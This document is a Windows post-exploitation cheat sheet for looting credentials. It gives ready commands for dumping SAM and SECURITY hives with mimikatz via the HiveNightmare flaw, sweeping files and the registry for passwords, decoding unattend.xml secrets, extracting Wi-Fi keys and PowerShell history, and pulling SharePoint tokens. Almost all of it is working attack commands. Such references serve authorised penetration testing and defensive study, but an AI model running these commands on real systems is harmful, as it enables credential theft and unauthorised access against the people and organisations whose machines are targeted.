Looting for passwords

- HiveNightmare

(CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user)

1. Check for the vulnerability using icacls

C:\Windows\System32> icacls config\SAM

config\SAM BUILTIN\Administrators:(I)(F)

NT AUTHORITY\SYSTEM:(I)(F)

BUILTIN\Users:(I)(RX) <-- this is wrong - regular users should not have read access!

1. Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it.

mimikatz> token::whoami /full

List shadow copies available:

mimikatz> misc::shadowcopies

Extract account from SAM databases:

mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

Extract secrets from SECURITY:

mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY

- Search for file contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt

findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt

findstr /spin "password" *.*

Also search in remote places such as SMB Shares and SharePoint:

• To search passwords in SharePoint: nheiniger/SnaffPoint (must be compiled first, for referencing issue see: nheiniger/SnaffPoint#6)

1. First, retrieve a token

Method 1: using SnaffPoint binary

$token = (.\GetBearerToken.exe https://your.sharepoint.com)

Method 2: using AADInternals

Install-Module AADInternals -Scope CurrentUser

Import-Module AADInternals

$token = (Get-AADIntAccessToken -ClientId "9bc3ab49-b65d-410a-85ad-de819febfddc" -Tenant "your.onmicrosoft.com" -Resource "https://your.sharepoint.com")

1. Second, search on Sharepoint

Method 1: using search strings in ./presets dir

.\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token

Method 2: using search string in command line

### -l uses FQL search, see: https://learn.microsoft.com/en-us/sharepoint/dev/general-development/fast-query-language-fql-syntax-reference

.\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token -l -q "filename:.config"

• To search passwords in SMB Shares: SnaffCon/Snaffler

- Search for a file with a certain filename

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

where /R C:\ user.txt

where /R C:\ *.ini

- Search the registry for key names and passwords

REG QUERY HKLM /F "password" /t REG_SZ /S /K

REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

If you want to save some time, query this specific key to find admin AutoLogon credentials (Windows Autologin):

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" --> SNMP parameters

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" --> Putty clear text proxy credentials

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s --> Putty clear text proxy credentials

reg query "HKCU\Software\ORL\WinVNC3\Password" --> VNC parameters

reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password --> VNC parameters

- Passwords in unattend.xml

1. Location of the unattend.xml files.

C:\unattend.xml

C:\Windows\Panther\Unattend.xml

C:\Windows\Panther\Unattend\Unattend.xml

C:\Windows\system32\sysprep.inf

C:\Windows\system32\sysprep\sysprep.xml

1. Display the content of these files with dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Example content:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">

<AutoLogon>

<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>

<Enabled>true</Enabled>

<Username>Administrateur</Username>

</AutoLogon>

<UserAccounts>

<LocalAccounts>

<LocalAccount wcm:action="add">

<Password>*SENSITIVE*DATA*DELETED*</Password>

<Group>administrators;users</Group>

<Name>Administrateur</Name>

</LocalAccount>

</LocalAccounts>

</UserAccounts>

1. Unattend credentials are stored in base64 and can be decoded manually with base64.

$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d

SecretSecurePassword1234*

1. The Metasploit module post/windows/gather/enum_unattend looks for these files.

- IIS Web config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

C:\inetpub\wwwroot\web.config

- Other files

%SYSTEMDRIVE%\pagefile.sys

%WINDIR%\debug\NetSetup.log

%WINDIR%\repair\sam

%WINDIR%\repair\system

%WINDIR%\repair\software, %WINDIR%\repair\security

%WINDIR%\iis6.log

%WINDIR%\system32\config\AppEvent.Evt

%WINDIR%\system32\config\SecEvent.Evt

%WINDIR%\system32\config\default.sav

%WINDIR%\system32\config\security.sav

%WINDIR%\system32\config\software.sav

%WINDIR%\system32\config\system.sav

%WINDIR%\system32\CCM\logs\*.log

%USERPROFILE%\ntuser.dat

%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

%WINDIR%\System32\drivers\etc\hosts

C:\ProgramData\Configs\*

C:\Program Files\Windows PowerShell\*

dir c:*vnc.ini /s /b

dir c:*ultravnc.ini /s /b

- Wifi passwords

1. Find AP SSID

netsh wlan show profile

1. Get Cleartext Pass

netsh wlan show profile <SSID>key=clear

1. Oneliner method to extract wifi passwords from all the access point.

cls&echo. &for/f "tokens=4 delims=: "%a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear |findstr"SSID Cipher Content"|find/v "Number"&echo.) &@echoon

- Sticky Notes passwords

The sticky notes app stores it's content in a sqlite db located at C:\Users<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

- Passwords stored in Key Manager

⚠️ This software will display its output in a GUI

rundll32 keymgr,KRShowKeyMgr

- Powershell History

Disable Powershell history: Set-PSReadlineOption -HistorySaveStyle SaveNothing.

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

cat (Get-PSReadlineOption).HistorySavePath

cat (Get-PSReadlineOption).HistorySavePath | sls passw

- Powershell Transcript

C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt

C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt

- Password in Alternate Data Stream

PS > Get-Item -path flag.txt -Stream *

PS > Get-Content -path flag.txt -Stream Flag

- ClearText passwords (quick hits)

We might somtetimes find passwords in arbitrary files, you can find them running:

findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini

Find all those strings in config files:

$ dir /s *pass* == *cred* == *vnc* == *.config*

Find all passwords in all files:

findstr /spin "password" *.*

These are common files to find them in. They might be base64-encoded. So look out for that.

type c:\sysprep.inf type c:\sysprep\sysprep.xml type c:\unattend.xml type %WINDIR%\Panther\Unattend\Unattended.xml type %WINDIR%\Panther\Unattended.xml

dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini

Stuff in the registry:

reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

Search for password in registry:

reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s

Using meterpreter:

> post/windows/gather/credentials/gpp > post/windows/gather/enum_unattend